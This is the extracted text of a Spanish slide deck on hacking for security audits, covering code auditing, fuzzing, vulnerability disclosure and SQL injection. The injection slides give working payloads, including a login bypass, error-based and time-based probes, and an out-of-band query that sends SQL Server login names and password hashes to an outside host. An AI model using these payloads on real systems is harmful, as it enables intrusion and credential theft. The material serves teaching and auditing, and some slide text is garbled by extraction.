PDF de programación - HACKING PARA AUDITORIA

Imágen de pdf HACKING PARA AUDITORIA

HACKING PARA AUDITORIAgráfica de visualizaciones

Actualizado el 21 de Marzo del 2018 (Publicado el 6 de Marzo del 2018)
835 visualizaciones desde el 6 de Marzo del 2018
829,3 KB
20 paginas
Creado hace 14a (06/11/2009)
HACKING PARA AUDITORIA

Contenido

 Hackers?? O Crackers??
 Auditoria de Código Binario
 SQL Injection
 Web Application Hacking

Hackers?? O Crackers??

Acceden a un sistema por canales no autorizados

 Cracker  Mala onda

 Hacker -> Buena onda

•Administradores de

Sistemas

•Conocimientos

Solidos

• Dependen de otras

Personas

FIRST
FIRST--
TIERTIER

SECOND
SECOND -- TIERTIER

THIRD
THIRD -- TIERTIER

OCI
SO

Vulnerabilidades

Habilidades y
Conocimientos

Especiales

Hackers?? O Crackers??

Acceden a un sistema por canales no autorizados

 Hacker -> Buena onda

•Administradores de

Sistemas

•Conocimientos

Solidos

• Dependen de otras

Personas

FIRST
FIRST--
TIERTIER

SECOND
SECOND -- TIERTIER

THIRD
THIRD -- TIERTIER

• Cualquier

persona
• Usan

mayormente

Scripts o
programas
• Amenaza

• Participan en

foros

TITULO
TITULO::

01100001 01110101 01100100 01101001 01110100 01101111 01110010 01101001
01100001 00100000 01100100 01100101 00100000 01100011 01101111 01100100
01101001 01100111 01101111 00100000 01100010 01101001 01101110 01100001
01110010 01101001 01101111 00100000 01101111 00100000 01100011 01101111
01100100 01101001 01100111 01101111 00100000 01100110 01110101 01100101

01101110 01110100 01100101

O SEA…

AUDITORIA DE CODIGO BINARIO O

CODIGO FUENTE

AUDITORIA DE CODIGO
AUDITORIA DE CODIGO

BINARIO
BINARIO

 Descubrir, explotar y/o arreglar

vulnerabilidades

 Proteger programas

Vulnerabilidades - Tecnicas

 Buscando patrones comunes vulnerables
 por azar: un blue screenes un accidente feliz...

A;asmdnfasdjfn9834534fjejhpreiuthewrpufrehgpi
wuerghewpriuA;asmdnfasdjfn9834534fjejhpreiuth

ewrpufrehgpiwuerghewpriugherwrpiugwerg

A;asmdnfasdjfn9834534fjejhpreiuthewrpufrehgpi

wuerghewpriugherwrpiugwerg

A;asmdnfasdjfn9834534fjejhpreiuthewrpufrehgpi

wuerghewpriugherwrpiugwerg

gherwrpiugwerg

 Aprovechando una nueva vulnerabilidad desde

otra aplicación

 Nuevas técnicas, nuevas ideas (inspiración)
 Manipulando las posibles entradas del programa

Vulnerabilidades - Tecnicas

 Con acceso al código fuente

 auditoria de código
 buscar patrones de vulnerabilidades

conocidas

 hacer una búsqueda exhaustiva del

código por patrones sospechosos

Vulnerabilidades - Tecnicas

 Sin acceso al código fuente

 dar input al azar ó con forma sospechosa
 usar un fuzzer
 ingeniería inversa para entender como
funciona (si esta disponible el binario)

 herramientas: desensambladores,

debuggers, …

Proceso de reporte de vulnerabilidades

Descubrimiento
Descubrimiento

Investigación
Investigación y y
Documentación
Documentación

Notificación
Notificación

Desarrollo
Desarrollo de la

de la soluci

soluciónón

Lanzamiento
Lanzamiento

SQL Injection

SQL Injection Básico

AUTENTIFICACION DEL SISTEMA

USUARIO:

‘ or 1=1; --
‘ or 1=1; --

CONTRASEÑA:

cualquier_cosa
cualquier_cosa

ENTRAR

SQL Injection Básico

$user = “ „ or 1=1; -- ”;

$pass = “cualquier_cosa”;

$sql = “select * from usuarios

where user = „$user‟ and
password = „$pass‟”;

$sql = “select * from usuarios

where user = „ ‟ and

„ or 1=1; --
”;

password = „ ‟

cualquier_cosa

SQL Injection

 Tres clases de SQL injection:

 In band: Los datos son extraidos por el mismo

canal por donde se realizo la inyeccion SQL.

 Out of Band: Los datos son recibidos por un canal
diferente (un correo con los resultados y enviados
al intruso)

 Inferential: Sin transferencia de datos, pero el

auditor puede reconstruir informacion observando
el comportamiento de la aplicacion

In band

http://[website]/page.asp?id=1 or

convert(int,(USER)) --

Out of Band

http://[website]/page.asp?id=1;declare @host

varchar(800); select @host = name + ‘ - ’+

master.sys.fn_varbintohexstr(password_hash) +

‘2.servidor.com’ from sys.sql_logins;

exec(‘xp_fileexist ‘’\\’ + @host + ‘\c$\boot.ini’’’);

--

Para obtener datos fuera del servidor

Inferential

http://[website]/page.asp?id=1;

if+not(select+system_user)+<>+’sa’+w

aitfor+delay+’0:0:10’ –

Se verifica si se esta corriendo como ‘sa’

FUENTE:

 Ethical Hacking Conference 2009

www.ehacking.com.bo

 Seguridad en Software Libre
Carlos Sarraute–ArielFutoransky
7 junio 2005

 Hack I.T.: Security Through Penetration Testing
T. J. Klevinsky Scott Laliberte Ajay Gupta
Publisher: Addison Wesley First Edition February 01, 2002
ISBN: 0-201-71956-8, 544 pages

PREGUNTAS

 ¿Qué medidas se pueden aplicar para evitar
intrusiones y asi proteger la información?

¿Qué otros métodos se pueden usar para
hackear aplicaciones web?
  • Links de descarga
http://lwp-l.com/pdf9245

Comentarios de: HACKING PARA AUDITORIA (0)


No hay comentarios
 

Comentar...

Nombre
Correo (no se visualiza en la web)
Valoración
Comentarios...
CerrarCerrar
CerrarCerrar
Cerrar

Tienes que ser un usuario registrado para poder insertar imágenes, archivos y/o videos.

Puedes registrarte o validarte desde aquí.

Codigo
Negrita
Subrayado
Tachado
Cursiva
Insertar enlace
Imagen externa
Emoticon
Tabular
Centrar
Titulo
Linea
Disminuir
Aumentar
Vista preliminar
sonreir
dientes
lengua
guiño
enfadado
confundido
llorar
avergonzado
sorprendido
triste
sol
estrella
jarra
camara
taza de cafe
email
beso
bombilla
amor
mal
bien
Es necesario revisar y aceptar las políticas de privacidad